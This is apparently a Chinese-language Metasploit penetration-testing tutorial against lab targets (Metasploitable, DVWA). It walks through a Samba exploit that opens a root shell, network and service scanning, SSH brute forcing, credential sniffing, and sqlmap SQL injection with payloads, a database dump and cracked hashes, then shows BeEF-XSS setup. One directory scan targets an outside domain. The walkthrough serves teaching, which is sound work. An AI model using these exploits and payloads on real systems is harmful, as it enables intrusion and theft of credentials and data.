                                                   ..th3.H1V3.U2VjRFNN.jMh+.`
                                                  `MjM~~WE.ARE.se~~MMjMs
                                                   +~KANSAS.CITY's~-`
                                                    J~HAKCERS~./.`
                                                    .esc:wq!:`
                                                     +++ATH`
                                                      `
    
    
           =[ metasploit v6.1.38-dev-c252faf9388449dd3af4f0ab1288c0ce82fe4cf9]
    + -- --=[ 2212 exploits - 1171 auxiliary - 396 post       ]
    + -- --=[ 615 payloads - 45 encoders - 11 nops            ]
    + -- --=[ 9 evasion                                       ]
    
    Metasploit tip: To save all commands executed since start up
    to a file, use the makerc command
    
    msf6 >
    

    在这里插入图片描述

    在这里插入图片描述

    使用msfconsole

    msf6 > search samba
    
    msf6 > use multi/samba/usermap_script
    
    msf6 exploit(multi/samba/usermap_script) > show payloads
    
    msf6 exploit(multi/samba/usermap_script) > set payload cmd/unix/bind_netcat
    
    msf6 exploit(multi/samba/usermap_script) > show options
    
    msf6 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.254
    
    msf6 exploit(multi/samba/usermap_script) > exploit
    
    msf6 exploit(multi/samba/usermap_script) > exploit
    
    [*] Started bind TCP handler against 10.10.10.254:4444
    [*] Command shell session 1 opened (0.0.0.0:0 -> 10.10.10.254:4444) at 2022-04-10 12:18:37 +0800
    

    在MSF终端里看到了“Command shell session 1 opened”的成功信息,这时可以输入一些Shell命令,如uname -a和whoami,来查看所控制的目标主机操作系统类型,以及所拥有的用户账户权限

    msf6 exploit(multi/samba/usermap_script) > exploit
    
    [*] Started bind TCP handler against 10.10.10.254:4444
    [*] Command shell session 1 opened (0.0.0.0:0 -> 10.10.10.254:4444) at 2022-04-10 12:18:37 +0800
    
    uname -a
    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
    whoami
    root
    ip addr
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
        link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
        inet 127.0.0.1/8 scope host lo
        inet6 ::1/128 scope host
           valid_lft forever preferred_lft forever
    2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
        link/ether 00:0c:29:a8:c8:7a brd ff:ff:ff:ff:ff:ff
        inet 10.10.10.254/24 brd 10.10.10.255 scope global eth0
        inet6 fe80::20c:29ff:fea8:c87a/64 scope link
           valid_lft forever preferred_lft forever
    3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
        link/ether 00:0c:29:a8:c8:84 brd ff:ff:ff:ff:ff:ff
        inet 192.168.10.254/24 brd 192.168.10.255 scope global eth1
        inet6 fe80::20c:29ff:fea8:c884/64 scope link
           valid_lft forever preferred_lft forever
    

    模拟环境渗透测试

    以下环节摒除正规渗透测试环境中的项目管理内容等,仅单纯利用Metasploit的各类模块对模拟环境进行渗透测试。

    modules
        ├─auxiliary  # 辅助模块
        ├─encoders  # 编码工具模块
        ├─evasion  # 混淆模块
        ├─exploits  # 渗 透模块
        ├─nops  # 空模块
        ├─payloads  # 攻击载荷模块
        └─post  # 后期渗透模块
    

    情报搜集

    Metasploit为渗透测试的信息搜集环境提供了大量的辅助模块支持,包括针对各种网络服务的扫描与查点、构建虚假服务收集登录口令、口令猜测破解、敏感信息嗅探、探查敏感信息泄露、Fuzz测试发掘漏洞、实施网络协议欺骗等模块。辅助模块能够帮助渗透测试者在进行渗透攻击之前得到目标系统丰富的情报信息,从而发起更具目标性的精准攻击。
    Metasploit位于情报搜集阶段主要利用auxiliary(辅助模块)。
    auxiliary(辅助模块):包含扫描、fuzz测试、漏洞挖掘、网络协议欺骗等程序。

    nslookup查询域名解析情况

    msf6 > nslookup www.dvssc.com
    [*] exec: nslookup www.dvssc.com
    
    服务器:  RTK_GW.bbrouter
    Address:  192.168.1.1
    
    非权威应答:
    名称:    hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com
    Addresses:  54.209.32.212
              52.71.57.184
    Aliases:  www.dvssc.com
              traff-1.hugedomains.com
    

    whois

    https://whois.chinaz.com/
    

    使用dir_scanner辅助模块搜索网站目录

    msf6 > use auxiliary/scanner/http/dir_scanner
    msf6 auxiliary(scanner/http/dir_scanner) > set threads 50
    threads => 50
    msf6 auxiliary(scanner/http/dir_scanner) > set rhosts www.dvssc.com
    rhosts => www.dvssc.com
    msf6 auxiliary(scanner/http/dir_scanner) > exploit
    
    [-] Warning: The Windows platform cannot reliably support more than 16 threads
    [-] Thread count has been adjusted to 16
    [*] Detecting error code
    [*] Using code '404' as not found for 10.10.10.129
    [+][+][+][+][+] Found http://www.dvssc.com:80/001/ 503 (10.10.10.129)
     Found http://www.dvssc.com:80/1/ 503 (10.10.10.129)
     Found http://www.dvssc.com:80/3/ 503 (10.10.10.129)
     Found http://www.dvssc.com:80/0001/ 503 (10.10.10.129)
     Found http://www.dvssc.com:80/0/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/00001/ 503 (10.10.10.129)
    [+][+][+][+] Found http://www.dvssc.com:80/1000/ 503 (10.10.10.129)
     Found http://www.dvssc.com:80/11/ 503 (10.10.10.129)
     Found http://www.dvssc.com:80/111/ 503 (10.10.10.129)
     Found http://www.dvssc.com:80/10/ 503 (10.10.10.129)
    [+][+][+][+][+] Found http://www.dvssc.com:80/04/ 503 (10.10.10.129)
     Found http://www.dvssc.com:80/123/ 503 (10.10.10.129)
     Found http://www.dvssc.com:80/1111/ 503 (10.10.10.129)
     Found http://www.dvssc.com:80/007/ 503 (10.10.10.129)
     Found http://www.dvssc.com:80/123321/ 503 (10.10.10.129)
    [+][+][+] Found http://www.dvssc.com:80/123123/ 503 (10.10.10.129)
     Found http://www.dvssc.com:80/1337/ 503 (10.10.10.129)
     Found http://www.dvssc.com:80/2/ 503 (10.10.10.129)
    [+][+][+] Found http://www.dvssc.com:80/777/ 503 (10.10.10.129)
     Found http://www.dvssc.com:80/6/ 503 (10.10.10.129)
     Found http://www.dvssc.com:80/5/ 503 (10.10.10.129)
    [+][+][+][+] Found http://www.dvssc.com:80/666/ 503 (10.10.10.129)
     Found http://www.dvssc.com:80/8/ 503 (10.10.10.129)
     Found http://www.dvssc.com:80/7/ 503 (10.10.10.129)
     Found http://www.dvssc.com:80/606/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/4/ 503 (10.10.10.129)
    [+][+] Found http://www.dvssc.com:80/911911/ 503 (10.10.10.129)
     Found http://www.dvssc.com:80/9/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/CHANGELOG/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/LICENSE/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/administrator/ 302 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/cache/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/cgi-bin/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/components/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/css/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/doc/ 403 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/f/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/gallery2/ 302 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/ghost/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/icons/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/images/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/includes/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/installation/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/javascript/ 403 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/js/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/libraries/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/language/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/login/ 500 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/logs/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/media/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/modules/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/phpBB2/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/plugins/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/phpmyadmin/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/templates/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/tmp/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/wordpress/ 200 (10.10.10.129)
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(scanner/http/dir_scanner) >
    

    使用arp_sweep模块探查活跃主机

    msf6 > use auxiliary/scanner/discovery/arp_sweep
    msf6 auxiliary(scanner/discovery/arp_sweep) > set rhosts 10.10.10.0/24
    msf6 auxiliary(scanner/discovery/arp_sweep) > set threads 10
    msf6 auxiliary(scanner/discovery/arp_sweep) > run
    

    在MSF终端中运行Nmap扫描工具

    msf6 > nmap 10.10.10.0/24
    

    使用Nmap进行活跃主机探则

    msf6 > nmap -Pn 10.10.10.0/24
    

    使用Nmap探测目标主机的操作系统版本

    msf6 > nmap -O 10.10.10.0/24
    

    Telnet服务扫描

    msf6 > use auxiliary/scanner/telnet/telnet_version
    msf6 auxiliary(scanner/telnet/telnet_version) > set rhost 10.10.10.0/24
    msf6 auxiliary(scanner/telnet/telnet_version) > set threads 100
    msf6 auxiliary(scanner/telnet/telnet_version) > run
    

    SSH服务扫描

    search ssh_version
    
    msf6 > use auxiliary/scanner/ssh/ssh_version
    msf6 auxiliary(scanner/ssh/ssh_version) > set rhost 10.10.10.0/24
    msf6 auxiliary(scanner/ssh/ssh_version) > set threads 100
    msf6 auxiliary(scanner/ssh/ssh_version) > run
    
    search ssh_login
    
    use auxiliary/scanner/ssh/ssh_login
    set RHOSTS 10.10.10.254
    set RPORT 22
    set STOP_ON_SUCCESS false
    set BLANK_PASSWORDS true
    set USER_FILE "c:\resource\user.txt"
    set PASS_FILE "c:\resource\pass.txt"
    

    Oracle服务扫描

    msf6 > use auxiliary/scanner/oracle/tnslsnr_version
    msf6 auxiliary(scanner/oracle/tnslsnr_version) > set rhosts 10.10.10.0/24
    msf6 auxiliary(scanner/oracle/tnslsnr_version) > set threads 50
    msf6 auxiliary(scanner/oracle/tnslsnr_version) > run
    

    SSH服务弱口令探测

    msf6 > use auxiliary/scanner/ssh/ssh_login
    msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 10.10.10.254
    msf6 auxiliary(scanner/ssh/ssh_login) > set uesrname root
    msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file /root/words.txt
    msf6 auxiliary(scanner/ssh/ssh_login) > set thread 50
    msf6 auxiliary(scanner/ssh/ssh_login) > run
    

    通过嗅探获取FTP用户名和口令

    msf6 > use auxiliary/sniffer/psnuffle
    msf6 auxiliary(sniffer/psnuffle) > run
    

    Nessus网络漏洞扫描

    详情阅读另一篇CentOS Docker环境部署Nessus

    渗透攻击

    Metasploit利用目标系统安全漏洞入侵系统并获得访问控制权。Metasploit位于渗透攻击阶段主要利用exploit(渗透模块)、payload(安全载荷模块)。
    exploit(渗透模块):是一段程序,运行时会利用目标的安全漏洞进行安全测试。
    payload(安全载荷模块):在成功对目标完成一次渗透测试,payload将在目标机器运行,帮助我们获取目标上需要的访问和运行权限。

    Web应用渗透

    SQL注入

    Sqlmap扫描
    Metasploit中没有Sqlmap模块了,需要直接安装Sqlmap
    python3直接在Windows10应用商店中安装
    在这里插入图片描述
    https://sqlmap.org/
    下载解压重命名为sqlmap放置到c目录下python c:/sqlmap/sqlmap.py+参数直接执行

    在这里插入图片描述

    http://10.10.10.129/dvwa/login.php
    
    uesrname:admin
    password:admin
    

    选择Damn Vulnerable Web Application
    在这里插入图片描述设置DVWA Security为low

    在这里插入图片描述
    选择SQL Injection
    在这里插入图片描述

    python c:/sqlmap/sqlmap.py -u http://10.10.10.129/dvwa/vulnerabilities/sqli/
    
    PS C:\Users\IDEA> python c:/sqlmap/sqlmap.py -u http://10.10.10.129/dvwa/vulnerabilities/sqli/
            ___
           __H__
     ___ ___[)]_____ ___ ___  {1.6.4.4#dev}
    |_ -| . [)]     | .'| . |
    |___|_  [(]_|_|_|__,|  _|
          |_|V...       |_|   https://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting @ 21:21:13 /2022-04-14/
    
    [21:21:14] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
    do you want to try URI injections in the target URL itself? [Y/n/q]
    
    [21:21:15] [INFO] testing connection to the target URL
    got a 302 redirect to 'http://10.10.10.129:80/dvwa/login.php'. Do you want to follow? [Y/n]
    
    you have not declared cookie(s), while server wants to set its own ('PHPSESSID=9547p2gdpmv...u0t9jme0i1;security=high;security=high'). Do you want to use those [Y/n]
    
    [21:21:17] [INFO] testing if the target URL content is stable
    [21:21:17] [WARNING] URI parameter '#1*' does not appear to be dynamic
    [21:21:17] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
    [21:21:17] [INFO] testing for SQL injection on URI parameter '#1*'
    [21:21:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [21:21:17] [WARNING] reflective value(s) found and filtering out
    [21:21:17] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
    [21:21:17] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [21:21:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
    [21:21:17] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
    [21:21:17] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
    [21:21:17] [INFO] testing 'Generic inline queries'
    [21:21:17] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
    [21:21:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
    [21:21:18] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
    [21:21:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
    [21:21:18] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
    [21:21:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
    [21:21:18] [INFO] testing 'Oracle AND time-based blind'
    it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]
    
    [21:21:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
    [21:21:19] [WARNING] URI parameter '#1*' does not seem to be injectable
    [21:21:19] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
    [21:21:19] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 72 times
    
    [*] ending @ 21:21:19 /2022-04-14/
    

    Sqlmap提示信息,它还是希望我们对于GET请求或POST请求提供参数,故添加参数

    you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
    do you want to try URI injections in the target URL itself?
    

    Sqlmap提示信息,它表示在测试过程会302重定向到登录界面,故添加Cookie保持登录状态

    testing connection to the target URL
    got a 302 redirect to 'http://10.10.10.129:80/dvwa/login.php'. Do you want to follow?
    

    Sqlmap提示信息,它表示暂时没有发现注入点,是否要减少请求数量

    it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests?
    

    打开F12调试器刷新界面点击任意请求查看Cookie信息
    在这里插入图片描述

    python c:/sqlmap/sqlmap.py -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0clv2ps64jve3460qfreo480i0;security=low"
    
    PS C:\Users\IDEA> python c:/sqlmap/sqlmap.py -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0clv2ps64jve3460qfreo480i0;security=low"
            ___
           __H__
     ___ ___[.]_____ ___ ___  {1.6.4.4#dev}
    |_ -| . [.]     | .'| . |
    |___|_  [(]_|_|_|__,|  _|
          |_|V...       |_|   https://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting @ 21:47:37 /2022-04-14/
    
    [21:47:37] [INFO] resuming back-end DBMS 'mysql'
    [21:47:37] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
        Payload: id=1' OR NOT 8674=8674#&Submit=Submit
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: id=1' AND (SELECT 6595 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(6595=6595,1))),0x7162626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- PvMo&Submit=Submit
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: id=1' AND (SELECT 8003 FROM (SELECT(SLEEP(5)))nllG)-- VIMR&Submit=Submit
    
        Type: UNION query
        Title: MySQL UNION query (NULL) - 2 columns
        Payload: id=1' UNION ALL SELECT CONCAT(0x716b627a71,0x55566c6a537556486d63506c4d56795972755679466965624a65696a454d6c4b555a786e6b4b4e4d,0x7162626271),NULL#&Submit=Submit
    ---
    [21:47:37] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
    web application technology: PHP 5.3.2, Apache 2.2.14
    back-end DBMS: MySQL >= 5.0
    [21:47:37] [INFO] fetched data logged to text files under 'C:\Users\IDEA\AppData\Local\sqlmap\output\10.10.10.129'
    
    [*] ending @ 21:47:37 /2022-04-14/
    

    Sqlmap提示信息,数据库为MySQL数据库

    resuming back-end DBMS 'mysql'
    

    Sqlmap提示信息,注入点为Parameter: id (GET)

    Parameter: id (GET)
    

    Sqlmap提示信息,SQL注入类型为Boolean注入、报错注入、时间注入、Union注入

    Type: boolean-based blind
    Type: error-based
    Type: time-based blind
    Type: UNION query
    

    Sqlmap提示信息,payload

    Payload: id=1' OR NOT 8674=8674#&Submit=Submit
    Payload: id=1' AND (SELECT 6595 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(6595=6595,1))),0x7162626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- PvMo&Submit=Submit
    Payload: id=1' AND (SELECT 8003 FROM (SELECT(SLEEP(5)))nllG)-- VIMR&Submit=Submit
    Payload: id=1' UNION ALL SELECT CONCAT(0x716b627a71,0x55566c6a537556486d63506c4d56795972755679466965624a65696a454d6c4b555a786e6b4b4e4d,0x7162626271),NULL#&Submit=Submit
    

    添加dump参数获取数据库数据,测试环境数据量小能够直接dump,数据量大要逐步查询数据库database、数据表table、数据字段columns、数据data,分别使用参数dbs、tables、columns、dump

    python c:/sqlmap/sqlmap.py -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0clv2ps64jve3460qfreo480i0;security=low" --dump
    
    PS C:\Users\IDEA> python c:/sqlmap/sqlmap.py -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0clv2ps64jve3460qfreo480i0;security=low" --dump
            ___
           __H__
     ___ ___["]_____ ___ ___  {1.6.4.4#dev}
    |_ -| . [,]     | .'| . |
    |___|_  [(]_|_|_|__,|  _|
          |_|V...       |_|   https://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting @ 21:57:58 /2022-04-14/
    
    [21:57:58] [INFO] resuming back-end DBMS 'mysql'
    [21:57:58] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
        Payload: id=1' OR NOT 8674=8674#&Submit=Submit
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: id=1' AND (SELECT 6595 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(6595=6595,1))),0x7162626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- PvMo&Submit=Submit
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: id=1' AND (SELECT 8003 FROM (SELECT(SLEEP(5)))nllG)-- VIMR&Submit=Submit
    
        Type: UNION query
        Title: MySQL UNION query (NULL) - 2 columns
        Payload: id=1' UNION ALL SELECT CONCAT(0x716b627a71,0x55566c6a537556486d63506c4d56795972755679466965624a65696a454d6c4b555a786e6b4b4e4d,0x7162626271),NULL#&Submit=Submit
    ---
    [21:57:58] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
    web application technology: PHP 5.3.2, Apache 2.2.14
    [21:57:58] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
    [21:57:58] [INFO] fetching current database
    [21:57:58] [INFO] fetching tables for database: 'dvwa'
    [21:57:58] [INFO] fetching columns for table 'guestbook' in database 'dvwa'
    [21:57:58] [INFO] fetching entries for table 'guestbook' in database 'dvwa'
    [21:57:58] [WARNING] reflective value(s) found and filtering out
    Database: dvwa
    Table: guestbook
    [1 entry]
    +------------+------+-------------------------+
    | comment_id | name | comment                 |
    +------------+------+-------------------------+
    | 1          | test | This is a test comment. |
    +------------+------+-------------------------+
    
    [21:57:58] [INFO] table 'dvwa.guestbook' dumped to CSV file 'C:\Users\IDEA\AppData\Local\sqlmap\output\10.10.10.129\dump\dvwa\guestbook.csv'
    [21:57:58] [INFO] fetching columns for table 'users' in database 'dvwa'
    [21:57:58] [INFO] fetching entries for table 'users' in database 'dvwa'
    [21:57:58] [INFO] recognized possible password hashes in column 'password'
    do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
    
    do you want to crack them via a dictionary-based attack? [Y/n/q]
    
    [21:58:04] [INFO] using hash method 'md5_generic_passwd'
    what dictionary do you want to use?
    [1] default dictionary file 'C:\sqlmap\data\txt\wordlist.tx_' (press Enter)
    [2] custom dictionary file
    [3] file with list of dictionary files
    >
    
    [21:58:04] [INFO] using default dictionary
    do you want to use common password suffixes? (slow!) [y/N]
    
    [21:58:05] [INFO] starting dictionary-based cracking (md5_generic_passwd)
    [21:58:05] [INFO] starting 8 processes
    [' for hash '21:58:11e99a18c428cb38d5f260853678922e03] ['
    [21:58:1321:58:13] [] [INFOINFO] cracked password '] current status: BCfNi... /charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
    [21:58:16] [INFO] cracked password 'admin' for hash '21232f297a57a5a743894a0e4a801fc3'
    ['NFO21:58:17] cracked password '] [INFOletmein] current status: bab12... -' for hash '0d107d09f5bbe40cade3de5c71e9e9b7
    [password21:58:19' for hash '] [5f4dcc3b5aa765d61d8327deb882cf99INFO'
    Database: dvwa
    Table: users
    [5 entries]
    +---------+---------+-------------------------------------------------+---------------------------------------------+-----------+------------+
    | user_id | user    | avatar                                          | password                                    | last_name | first_name |
    +---------+---------+-------------------------------------------------+---------------------------------------------+-----------+------------+
    | 1       | admin   | http://owaspbwa/dvwa/hackable/users/admin.jpg   | 21232f297a57a5a743894a0e4a801fc3 (admin)    | admin     | admin      |
    | 2       | gordonb | http://owaspbwa/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
    | 3       | 1337    | http://owaspbwa/dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
    | 4       | pablo   | http://owaspbwa/dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      |
    | 5       | smithy  | http://owaspbwa/dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
    +---------+---------+-------------------------------------------------+---------------------------------------------+-----------+------------+
    
    [21:58:30] [INFO] table 'dvwa.users' dumped to CSV file 'C:\Users\IDEA\AppData\Local\sqlmap\output\10.10.10.129\dump\dvwa\users.csv'
    [21:58:30] [INFO] fetched data logged to text files under 'C:\Users\IDEA\AppData\Local\sqlmap\output\10.10.10.129'
    

    跨站脚本攻击

    XSSF已经停止维护,使用Beef-XSS

    https://github.com/beefproject/beef/

    启动Kali Linux安装Beef-XSS

    cd /etc/
    
    git clone https://github.com/beefproject/beef.git
    
    cd beef
    
    ./install
    

    启动Beef

    ./beef
    

    提示默认用户名和口令需要修改

    root@DESKTOP-9I2FBB4:/etc/beef# ./beef
    [22:52:19][!] ERROR: Default username and password in use!
    [22:52:19]    |_  Change the beef.credentials.passwd in config.yaml
    
    vi config.yaml
    
    # Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
    # Browser Exploitation Framework (BeEF) - http://beefproject.com
    # See the file 'doc/COPYING' for copying permission
    #
    # BeEF Configuration file
    
    beef:
        version: '0.5.4.0'
        # More verbose messages (server-side)
        debug: false
        # More verbose messages (client-side)
        client_debug: false
        # Used for generating secure tokens
        crypto_default_value_length: 80
    
        # Credentials to authenticate in BeEF.
        # Used by both the RESTful API and the Admin interface
        credentials:
            user:   "beef"
            passwd: "beef"
    
        # Interface / IP restrictions
        restrictions:
            # subnet of IP addresses that can hook to the framework
            permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
            # subnet of IP addresses that can connect to the admin UI
            #permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
            permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
            # subnet of IP addresses that cannot be hooked by the framework
            excluded_hooking_subnet: []
            # slow API calls to 1 every  api_attempt_delay  seconds
            api_attempt_delay: "0.05"
    
        # HTTP server
        http:
            debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
            host: "0.0.0.0"
            port: "3000"
    
            # Decrease this setting to 1,000 (ms) if you want more responsiveness
            #  when sending modules and retrieving results.
            # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
            #  when hooking lots of browsers (50+).
            # Enabling WebSockets is generally better (beef.websocket.enable)
            xhr_poll_timeout: 1000
    
            # Host Name / Domain Name
            # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
            # These settings will be used to create a public facing URL
            # This public facing URL will be used for all hook related calls
            # set the public setting below:
            # public:
            #     host: "" # public hostname/IP address
            #     port: "" # public port will default to 80 if no https 443 if https
                          # and local if not set but there is a public host
            #     https: false # true/false
    
            # Reverse Proxy / NAT
            # If you want BeEF to be accessible behind a reverse proxy or NAT,
            #   set both the publicly accessible hostname/IP address and port below:
            # NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
            #   by altering the X-FORWARDED-FOR ip address in the request header.
            allow_reverse_proxy: false
    
            # Hook
            hook_file: "/hook.js"
            hook_session_name: "BEEFHOOK"
    
            # Allow one or multiple origins to access the RESTful API using CORS
            # For multiple origins use: "http://browserhacker.com, http://domain2.com"
            restful_api:
                allow_cors: false
                cors_allowed_domains: "http://browserhacker.com"
    
            # Prefer WebSockets over XHR-polling when possible.
            websocket:
                enable: false
                port: 61985 # WS: good success rate through proxies
                # Use encrypted 'WebSocketSecure'
                # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
                secure: true
                secure_port: 61986 # WSSecure
                ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command exec
    ute on it
                ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel
    
            # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
            web_server_imitation:
                enable: true
                type: "apache" # Supported: apache, iis, nginx
                hook_404: false # inject BeEF hook in HTTP 404 responses
                hook_root: false # inject BeEF hook in the server home page
            # Experimental HTTPS support for the hook / admin / all other Thin managed web services
            https:
                enable: false
                # Enabled this config setting if you're external facing uri is using https
                public_enabled: false
                # In production environments, be sure to use a valid certificate signed for the value
                # used in beef.http.public (the domain name of the server where you run BeEF)
                key: "beef_key.pem"
                cert: "beef_cert.pem"
    
        database:
            file: "beef.db"
    
        # Autorun Rule Engine
        autorun:
            # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterva
    l
            # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or event
    ually
            # continue execution regardless of results.
            # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase th
    e timeout.
            result_poll_interval: 300
            result_poll_timeout: 5000
    
            # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
